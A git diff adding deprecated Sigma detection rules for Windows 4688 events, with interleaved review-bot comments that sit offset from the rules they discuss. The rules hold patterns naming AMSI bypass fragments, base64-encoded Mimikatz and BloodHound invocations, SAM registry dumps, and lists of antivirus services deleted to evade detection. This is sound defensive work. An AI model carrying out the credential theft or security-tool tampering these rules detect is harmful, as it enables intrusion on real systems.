+title: Excel Proxy Executing Regsvr32 With Payload Alternate
+id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
+status: deprecated
+description: |
+ Excel called wmic to finally proxy execute regsvr32 with the payload.
+ An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
+ But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
+ Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
+ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
+date: 2021/08/23
+modified: 2022/12/02
+tags:
+ - attack.t1204.002
+ - attack.t1047
+ - attack.t1218.010
+ - attack.execution
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ #useful_information: add more LOLBins to the rules logic of your choice.
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains:
+ - regsvr32
+ - rundll32
+ - msiexec
+ - mshta
+ - verclsid
+ selection2:
+ - NewProcessName|endswith: \wbem\WMIC.exe
+ - CommandLine|contains: 'wmic '
+ selection3:
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ selection4:
+ CommandLine|contains|all:
+ - process
+ - create
+ - call
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml
new file mode 100644
index 000000000..cca7a403b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml
@@ -0,0 +1,41 @@
+title: Office Applications Spawning Wmi Cli Alternate
+id: 04f5363a-6bca-42ff-be70-0d28bf629ead
+status: deprecated
+description: Initial execution of malicious document calls wmic to execute the file with regsvr32
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
+ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
+date: 2021/08/23
+modified: 2023/02/04
+tags:
+ - attack.t1204.002
+ - attack.t1047
+ - attack.t1218.010
+ - attack.execution
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ #useful_information: Add more office applications to the rule logic of choice
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ - NewProcessName|endswith: \wbem\WMIC.exe
+ - CommandLine|contains: 'wmic '
+ selection2:
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ - \msaccess.exe
+ - \mspub.exe
+ - \eqnedt32.exe
+ - \visio.exe
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml
new file mode 100644
index 000000000..e05210ee9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml
@@ -0,0 +1,42 @@
+title: Possible Applocker Bypass
+id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719
+status: deprecated
+description: Detects execution of executables that can be used to bypass Applocker whitelisting
+references:
+ - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt
+ - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md
+author: juju4
+date: 2019/01/16
+modified: 2022/11/03
+tags:
+ - attack.defense_evasion
+ - attack.t1218.004
+ - attack.t1218.009
+ - attack.t1127.001
+ - attack.t1218.005
+ - attack.t1218 # no way to map 1:1, so the technique level is required
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - \msdt.exe
+ - \installutil.exe
+ - \regsvcs.exe
+ - \regasm.exe
+ #- '\regsvr32.exe' # too many FPs, very noisy
+ - \msbuild.exe
+ - \ieexec.exe
+ #- '\mshta.exe'
+ #- '\csc.exe'
+ condition: process_creation and selection
+falsepositives:
+ - False positives depend on scripts and administrative tools used in the monitored environment
+ - Using installutil to add features for .NET applications (primarily would occur in developer environments)
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml
new file mode 100644
index 000000000..fdf71a4fa
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml
@@ -0,0 +1,34 @@
+title: PowerShell AMSI Bypass Pattern
+id: 4f927692-68b5-4267-871b-073c45f4f6fe
+status: deprecated
+description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
+author: '@Kostastsale'
+references:
+ - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+date: 2022/11/04
+modified: 2023/02/03
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+ - attack.execution
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains|all:
+ - '[Ref].Assembly.GetType'
+ - SetValue($null,$true)
+ - NonPublic,Static
+ NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - \powershell_ise.exe
+ condition: process_creation and selection1
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
new file mode 100644
index 000000000..2f8e5e3c7
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
@@ -0,0 +1,45 @@
+title: Malicious Base64 Encoded Powershell Invoke Cmdlets
+id: fd6e2919-3936-40c9-99db-0aa922c356f7
+related:
+ - id: 6385697e-9f1b-40bd-8817-f4a91f40508e
+ type: similar
+status: deprecated
+description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
+references:
+ - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
+author: pH-T (Nextron Systems)
+date: 2022/05/31
+modified: 2023/01/30
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.defense_evasion
+ - attack.t1027
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ # Invoke-BloodHound
+ - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA
+ - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA
+ - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA
+ # Invoke-Mimikatz
+ - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA
+ - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A
+ - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg
+ # Invoke-WMIExec
+ - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA
+ - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw
+ - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA
+ condition: process_creation and selection
+fields:
+ - CommandLine
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml
new file mode 100644
index 000000000..1f5d86614
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml
@@ -0,0 +1,35 @@
+title: Base64 Encoded Listing of Shadowcopy
+id: 47688f1b-9f51-4656-b013-3cc49a166a36
+status: deprecated
+description: Detects base64 encoded listing Win32_Shadowcopy
+references:
+ - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
+author: Christian Burkard (Nextron Systems)
+date: 2022/03/01
+modified: 2023/01/30
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.defense_evasion
+ - attack.t1027
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ # Win32_Shadowcopy | ForEach-Object
+ CommandLine|contains:
+ - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA
+ - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A
+ - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA
+ condition: process_creation and selection
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml
new file mode 100644
index 000000000..b62565a5e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml
@@ -0,0 +1,28 @@
+title: Potential PowerShell Base64 Encoded Shellcode
+id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
+status: deprecated
+description: Detects potential powershell Base64 encoded Shellcode
+references:
+ - https://twitter.com/cyb3rops/status/1063072865992523776
+author: Florian Roth (Nextron Systems)
+date: 2018/11/17
+modified: 2023/04/06
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - OiCAAAAYInlM
+ - OiJAAAAYInlM
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml
new file mode 100644
index 000000000..5e4c46a95
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml
@@ -0,0 +1,35 @@
+title: Suspicious Bitsadmin Job via PowerShell
+id: f67dbfce-93bc-440d-86ad-a95ae8858c90
+status: deprecated
+description: Detect download by BITS jobs via PowerShell
+references:
+ - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+author: Endgame, JHasenbusch (ported to sigma for oscd.community)
+date: 2018/10/30
+modified: 2022/11/21
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: Start-BitsTransfer
+ NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ condition: process_creation and selection
+fields:
+ - SubjectUserName
+ - ComputerName
+ - CommandLine
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml
new file mode 100644
index 000000000..358f7499e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml
@@ -0,0 +1,44 @@
+title: Stop Or Remove Antivirus Service
+id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b
+status: deprecated
+description: |
+ Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.
+ Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
+ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
+author: frack113
+date: 2021/07/07
+modified: 2023/03/04
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_action:
+ CommandLine|contains:
+ - 'Stop-Service '
+ - 'Remove-Service '
+ selection_product:
+ CommandLine|contains:
+ # Feel free to add more service name
+ - ' McAfeeDLPAgentService'
+ - ' Trend Micro Deep Security Manager'
+ - ' TMBMServer'
+ - Sophos
+ - Symantec
+ condition: process_creation and (all of selection*)
+fields:
+ - SubjectUserName
+ - ComputerName
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml
new file mode 100644
index 000000000..36826b2d0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml
@@ -0,0 +1,40 @@
+title: Potential Xor Encoded PowerShell Command
+id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6
+related:
+ - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f
+ type: similar
+status: deprecated
+description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
+references:
+ - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
+author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+date: 2022/07/06
+modified: 2023/01/30
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.exe
+ - pwsh.dll
+ selection_cli:
+ CommandLine|contains|all:
+ - ForEach
+ - Xor
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml
new file mode 100644
index 000000000..a8388671b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml
@@ -0,0 +1,34 @@
+title: Registry Dump of SAM Creds and Secrets
+id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
+related:
+ - id: fd877b94-9bb5-4191-bb25-d79cbd93c167
+ type: similar
+status: deprecated
+description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
+author: frack113
+date: 2022/01/05
+modified: 2023/02/04
+tags:
+ - attack.credential_access
+ - attack.t1003.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_reg:
+ CommandLine|contains: ' save '
+ selection_key:
+ CommandLine|contains:
+ - HKLM\sam
+ - HKLM\system
+ - HKLM\security
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml
new file mode 100644
index 000000000..759fd565e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml
@@ -0,0 +1,90 @@ +title: Regsvr32 Anomaly +id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d +status: deprecated +description: Detects various anomalies in relation to regsvr32.exe +references: + - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html + - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ +author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton +date: 2019/01/16 +modified: 2023/05/26 +tags: + - attack.defense_evasion + - attack.t1218.010 + - car.2019-04-002 + - car.2019-04-003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: \Temp\ + NewProcessName|endswith: \regsvr32.exe + selection2: + NewProcessName|endswith: \regsvr32.exe + ParentProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + selection3: + NewProcessName|endswith: \regsvr32.exe + ParentProcessName|endswith: \cmd.exe + selection4a: + CommandLine|contains|all: + - '/i:' + - http + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe + selection4b: + CommandLine|contains|all: + - '/i:' + - ftp + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe + selection5: + NewProcessName|endswith: + - \cscript.exe + - \wscript.exe + ParentProcessName|endswith: \regsvr32.exe + selection6: + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + NewProcessName|endswith: \EXCEL.EXE + selection7: + ParentProcessName|endswith: \mshta.exe + NewProcessName|endswith: \regsvr32.exe + selection8: + CommandLine|contains: + - \AppData\Local + - C:\Users\Public + NewProcessName|endswith: \regsvr32.exe + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 + CommandLine|endswith: + - .jpg + - .jpeg + - .png + - .gif + - .bin + - .tmp + - .temp + - .txt + NewProcessName|endswith: \regsvr32.exe + filter1: + CommandLine|contains: + - 
\AppData\Local\Microsoft\Teams + - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll + filter2: + CommandLine|contains: \Program Files\Box\Box\Temp\ + ParentProcessName: C:\Program Files\Box\Box\FS\streem.exe + filter_legitimate: + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + condition: process_creation and (1 of selection* and not 1 of filter*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml new file mode 100644 index 000000000..7923e73d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml 
@@ -0,0 +1,43 @@
+title: Renamed PaExec Execution
+id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b
+status: deprecated
+description: Detects execution of renamed paexec via imphash and executable product string
+references:
+ - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc
+ - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
+author: Jason Lynch
+date: 2019/04/17
+modified: 2023/02/14
+tags:
+ - attack.defense_evasion
+ - attack.t1036.003
+ - attack.g0046
+ - car.2013-05-009
+ - attack.execution
+ - attack.t1569.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ - Product|contains: PAExec
+ - Imphash:
+ - 11D40A7B7876288F919AB819CC2D9802
+ - 6444f8a34e99b8f7d9647de66aabe516
+ - dfd6aa3f7b2b1035b76b718f1ddc689f
+ - 1a6cca4d5460b1710a12dea39e4a592c
+ - Hashes|contains:
+ - IMPHASH=11D40A7B7876288F919AB819CC2D9802
+ - IMPHASH=6444f8a34e99b8f7d9647de66aabe516
+ - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f
+ - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c
+ filter:
+ NewProcessName|contains: paexec
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml
new file mode 100644
index 000000000..3de7a8d9e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml
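Review bot: In this Security-channel (EventID 4688) conversion the `selection:` block can never match: `Product`, `Imphash` and `Hashes` are Sysmon process-creation fields, and a 4688 event carries none of them, so every alternative in the list is evaluated against an absent field. The only clause 4688 can actually evaluate is the `filter` on `NewProcessName|contains: paexec`, which by itself only suppresses. Since the rule is already `status: deprecated`, the cleanest outcome is to not emit it into the builtin set; if it is kept, a comment such as `# NOTE: Product/Imphash/Hashes exist only in Sysmon EID 1; this builtin copy cannot fire on 4688` would stop readers from expecting coverage here.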
@@ -0,0 +1,37 @@
+title: Root Certificate Installed
+id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc
+related:
+ - id: 42821614-9264-4761-acfc-5772c3286f76
+ type: derived
+status: deprecated
+description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
+author: oscd.community, @redcanary, Zach Stanford @svch0st
+date: 2020/10/10
+modified: 2023/03/05
+tags:
+ - attack.defense_evasion
+ - attack.t1553.004
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains|all:
+ - -addstore
+ - root
+ NewProcessName|endswith: \certutil.exe
+ selection2:
+ CommandLine|contains|all:
+ - /add
+ - root
+ NewProcessName|endswith: \CertMgr.exe
+ condition: process_creation and (selection1 or selection2)
+falsepositives:
+ - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml
new file mode 100644
index 000000000..90a1cad90
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml
@@ -0,0 +1,26 @@
+title: Run from a Zip File
+id: 1a70042a-6622-4a2b-8958-267625349abf
+status: deprecated
+description: Payloads may be compressed, archived, or encrypted in order to avoid detection
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file
+author: frack113
+date: 2021/12/26
+modified: 2023/03/05
+tags:
+ - attack.impact
+ - attack.t1485
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|contains: .zip\
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml
new file mode 100644
index 000000000..d41ee86f3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml
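Review bot: The `tags` block (`attack.impact`, `attack.t1485`) contradicts the rule's own description and reference, which describe execution from a compressed file — the T1027 defense-evasion atomic test named in the URL — not data destruction. The mismatch is inherited from upstream, but if this deprecated copy stays in the tree it will mis-bucket hits in any tactic-based summary, so either drop the rule or annotate it with `# NOTE: tags inherited from upstream; reference describes T1027 (defense evasion), not T1485`. The `NewProcessName|contains: .zip\` match only fires when the extracted path still contains the archive name, which is worth saying in the description so readers do not expect it to cover archives extracted elsewhere.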
@@ -0,0 +1,123 @@ +title: Suspicious Execution of Sc to Delete AV Services +id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b +status: deprecated +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection +references: + - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/01 +modified: 2023/03/04 +tags: + - attack.execution + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + selection_cli: + CommandLine|contains: ' delete ' + selection_av_process: + CommandLine|contains: + # Delete Service 'AVG' + - AvgAdminServer + - AVG Antivirus + - MBEndpointAgent + # Delete Service 'Malwarebytes' + - MBAMService + - MBCloudEA + - avgAdminClient + # Delete Service 'Sophos' + - SAVService + - SAVAdminService + - Sophos AutoUpdate Service + - Sophos Clean Service + - Sophos Device Control Service + - Sophos File Scanner Service + - Sophos Health Service + - Sophos MCS Agent + - Sophos MCS Client + - SntpService + - swc_service + - swi_service + - Sophos UI + - swi_update + - Sophos Web Control Service + - Sophos System Protection Service + - Sophos Safestore Service + - hmpalertsvc + - RpcEptMapper + - Sophos Endpoint Defense Service + - SophosFIM + - swi_filter + # Delete Service 'FireBird' + - FirebirdGuardianDefaultInstance + - FirebirdServerDefaultInstance + # Delete Service 'Webroot' + - WRSVC + # Delete Service 'ESET' + - ekrn + - ekrnEpsw + # Delete Service 'Kaspersky' + - klim6 + - AVP18.0.0 + - KLIF + - klpd + - klflt + - klbackupdisk + - klbackupflt + - klkbdflt + - klmouflt + - klhk + - KSDE1.0.0 + - kltap + # Delete Service 'Quick Heal' + - ScSecSvc + - Core Mail Protection + - Core Scanning Server + - 
Core Scanning ServerEx + - Online Protection System + - RepairService + - Core Browsing Protection + - Quick Update Service + # Delete Service 'McAfee' + - McAfeeFramework + - macmnsvc + - masvc + - mfemms + - mfevtp + # Delete Service 'Trend Micro' + - TmFilter + - TMLWCSService + - tmusa + - TmPreFilter + - TMSmartRelayService + - TMiCRCScanService + - VSApiNt + - TmCCSF + - tmlisten + - TmProxy + - ntrtscan + - ofcservice + - TmPfw + - PccNTUpd + # Delete Service 'Panda' + - PandaAetherAgent + - PSUAService + - NanoServiceMain + - EPIntegrationService + - EPProtectedService + - EPRedline + - EPSecurityService + - EPUpdateService + condition: process_creation and (all of selection*) +falsepositives: + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml new file mode 100644 index 000000000..74de89438 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml 
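Review bot: `RpcEptMapper` is listed under `# Delete Service 'Sophos'`, but it is the Windows RPC Endpoint Mapper service rather than a vendor AV component, so the grouping comment misleads anyone tuning this list. Deleting it is still worth an alert, so keep the entry but move it under its own comment, e.g. `# Core Windows service (RPC Endpoint Mapper) - deletion is destructive, not AV-specific`. This hunk is split across two physical lines at `- Core Scanning ServerEx`, which looks like a rendering artifact rather than a content problem.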
@@ -0,0 +1,34 @@
+title: Suspicious Add Scheduled Task From User AppData Temp
+id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8
+status: deprecated
+description: schtasks.exe create task from user AppData\Local\Temp
+references:
+ - malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
+author: frack113
+date: 2021/11/03
+modified: 2023/03/14
+tags:
+ - attack.execution
+ - attack.t1053.005
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ schtasks:
+ NewProcessName|endswith: \schtasks.exe
+ option:
+ CommandLine|contains|all:
+ - '/Create '
+ - \AppData\Local\Temp
+ filter_klite_codec:
+ CommandLine|contains|all:
+ - '/Create /TN "klcp_update" /XML '
